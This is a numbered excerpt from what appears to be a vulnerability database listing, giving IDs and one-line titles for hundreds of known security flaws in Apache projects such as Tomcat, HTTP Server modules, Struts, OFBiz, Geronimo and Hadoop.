13444| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
13445| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
13446| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
13447| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
13448| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
13449| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
13450| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
13451| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
13452| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
13453| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
13454| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
13455| [74725] Apache Wicket Multi Window Support Unspecified XSS
13456| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
13457| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
13458| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
13459| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
13460| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
13461| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
13462| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
13463| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
13464| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
13465| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
13466| [73644] Apache XML Security Signature Key Parsing Overflow DoS
13467| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
13468| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
13469| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
13470| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
13471| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
13472| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
13473| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
13474| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
13475| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
13476| [73154] Apache Archiva Multiple Unspecified CSRF
13477| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
13478| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
13479| [72238] Apache Struts Action / Method Names <
13480| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
13481| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
13482| [71557] Apache Tomcat HTML Manager Multiple XSS
13483| [71075] Apache Archiva User Management Page XSS
13484| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
13485| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
13486| [70924] Apache Continuum Multiple Admin Function CSRF
13487| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
13488| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
13489| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
13490| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
13491| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
13492| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
13493| [69520] Apache Archiva Administrator Credential Manipulation CSRF
13494| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
13495| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
13496| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
13497| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
13498| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
13499| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
13500| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
13501| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
13502| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
13503| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
13504| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
13505| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
13506| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
13507| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
13508| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
13509| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
13510| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
13511| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
13512| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
13513| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
13514| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
13515| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
13516| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
13517| [65054] Apache ActiveMQ Jetty Error Handler XSS
13518| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
13519| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
13520| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
13521| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
13522| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
13523| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
13524| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
13525| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
13526| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
13527| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
13528| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
13529| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
13530| [63895] Apache HTTP Server mod_headers Unspecified Issue
13531| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
13532| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
13533| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
13534| [63140] Apache Thrift Service Malformed Data Remote DoS
13535| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
13536| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
13537| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
13538| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
13539| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
13540| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
13541| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
13542| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
13543| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
13544| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
13545| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
13546| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
13547| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
13548| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
13549| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
13550| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
13551| [60678] Apache Roller Comment Email Notification Manipulation DoS
13552| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
13553| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
13554| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
13555| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
13556| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
13557| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
13558| [60232] PHP on Apache php.exe Direct Request Remote DoS
13559| [60176] Apache Tomcat Windows Installer Admin Default Password
13560| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
13561| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
13562| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
13563| [59944] Apache Hadoop jobhistory.jsp XSS
13564| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
13565| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
13566| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
13567| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
13568| [59019] Apache mod_python Cookie Salting Weakness
13569| [59018] Apache Harmony Error Message Handling Overflow
13570| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
13571| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
13572| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
13573| [59010] Apache Solr get-file.jsp XSS
13574| [59009] Apache Solr action.jsp XSS
13575| [59008] Apache Solr analysis.jsp XSS
13576| [59007] Apache Solr schema.jsp Multiple Parameter XSS
13577| [59006] Apache Beehive select / checkbox Tag XSS
13578| [59005] Apache Beehive jpfScopeID Global Parameter XSS
13579| [59004] Apache Beehive Error Message XSS
13580| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
13581| [59002] Apache Jetspeed default-page.psml URI XSS
13582| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
13583| [59000] Apache CXF Unsigned Message Policy Bypass
13584| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
13585| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
13586| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
13587| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
13588| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
13589| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
13590| [58993] Apache Hadoop browseBlock.jsp XSS
13591| [58991] Apache Hadoop browseDirectory.jsp XSS
13592| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
13593| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
13594| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
13595| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
13596| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
13597| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
13598| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
13599| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
13600| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
13601| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
13602| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
13603| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
13604| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
13605| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
13606| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
13607| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
13608| [58974] Apache Sling /apps Script User Session Management Access Weakness
13609| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
13610| [58931] Apache Geronimo Cookie Parameters Validation Weakness
13611| [58930] Apache Xalan-C++ XPath Handling Remote DoS
13612| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
13613| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
13614| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
13615| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
13616| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
13617| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
13618| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
13619| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
13620| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
13621| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
13622| [58805] Apache Derby Unauthenticated Database / Admin Access
13623| [58804] Apache Wicket Header Contribution Unspecified Issue
13624| [58803] Apache Wicket Session Fixation
13625| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
13626| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
13627| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
13628| [58799] Apache Tapestry Logging Cleartext Password Disclosure
13629| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
13630| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
13631| [58796] Apache Jetspeed Unsalted Password Storage Weakness
13632| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
13633| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
13634| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
13635| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
13636| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
13637| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
13638| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
13639| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
13640| [58775] Apache JSPWiki preview.jsp action Parameter XSS
13641| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
13642| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
13643| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
13644| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
13645| [58770] Apache JSPWiki Group.jsp group Parameter XSS
13646| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
13647| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
13648| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
13649| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
13650| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
13651| [58763] Apache JSPWiki Include Tag Multiple Script XSS
13652| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
13653| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
13654| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
13655| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
13656| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
13657| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
13658| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
13659| [58755] Apache Harmony DRLVM Non-public Class Member Access
13660| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
13661| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
13662| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
13663| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
13664| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
13665| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
13666| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
13667| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
13668| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
13669| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
13670| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
13671| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
13672| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
13673| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
13674| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
13675| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
13676| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
13677| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
13678| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
13679| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
13680| [58725] Apache Tapestry Basic String ACL Bypass Weakness
13681| [58724] Apache Roller Logout Functionality Failure Session Persistence
13682| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
13683| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
13684| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
13685| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
13686| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
13687| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
13688| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
13689| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
13690| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
13691| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
13692| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
13693| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
13694| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
13695| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
13696| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
13697| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
13698| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
13699| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
13700| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
13701| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
13702| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
13703| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
13704| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
13705| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
13706| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
13707| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
13708| [58687] Apache Axis Invalid wsdl Request XSS
13709| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
13710| [58685] Apache Velocity Template Designer Privileged Code Execution
13711| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
13712| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
13713| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
13714| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
13715| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
13716| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
13717| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
13718| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
13719| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
13720| [58667] Apache Roller Database Cleartext Passwords Disclosure
13721| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
13722| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
13723| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
13724| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
13725| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
13726| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
13727| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
13728| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
13729| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
13730| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
13731| [56984] Apache Xerces2 Java Malformed XML Input DoS
13732| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
13733| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
13734| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
13735| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
13736| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
13737| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
13738| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
13739| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
13740| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
13741| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
13742| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
13743| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
13744| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
13745| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
13746| [55056] Apache Tomcat Cross-application TLD File Manipulation
13747| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
13748| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
13749| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
13750| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
13751| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
13752| [54589] Apache Jserv Nonexistent JSP Request XSS
13753| [54122] Apache Struts s:a / s:url Tag href Element XSS
13754| [54093] Apache ActiveMQ Web Console JMS Message XSS
13755| [53932] Apache Geronimo Multiple Admin Function CSRF
13756| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
13757| [53930] Apache Geronimo /console/portal/ URI XSS
13758| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
13759| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
13760| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
13761| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
13762| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
13763| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
13764| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
13765| [53380] Apache Struts Unspecified XSS
13766| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
13767| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
13768| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
13769| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
13770| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
13771| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
13772| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
13773| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
13774| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
13775| [51151] Apache Roller Search Function q Parameter XSS
13776| [50482] PHP with Apache php_value Order Unspecified Issue
13777| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
13778| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
13779| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
13780| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
13781| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
13782| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
13783| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
13784| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
13785| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
13786| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
13787| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
13788| [47096] Oracle Weblogic Apache Connector POST Request Overflow
13789| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
13790| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
13791| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
13792| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
13793| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
13794| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
13795| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
13796| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
13797| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
13798| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
13799| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
13800| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
13801| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
13802| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
13803| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
13804| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
13805| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
13806| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
13807| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
13808| [43452] Apache Tomcat HTTP Request Smuggling
13809| [43309] Apache Geronimo LoginModule Login Method Bypass
13810| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
13811| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
13812| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
13813| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
13814| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
13815| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
13816| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
13817| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
13818| [42091] Apache Maven Site Plugin Installation Permission Weakness
13819| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
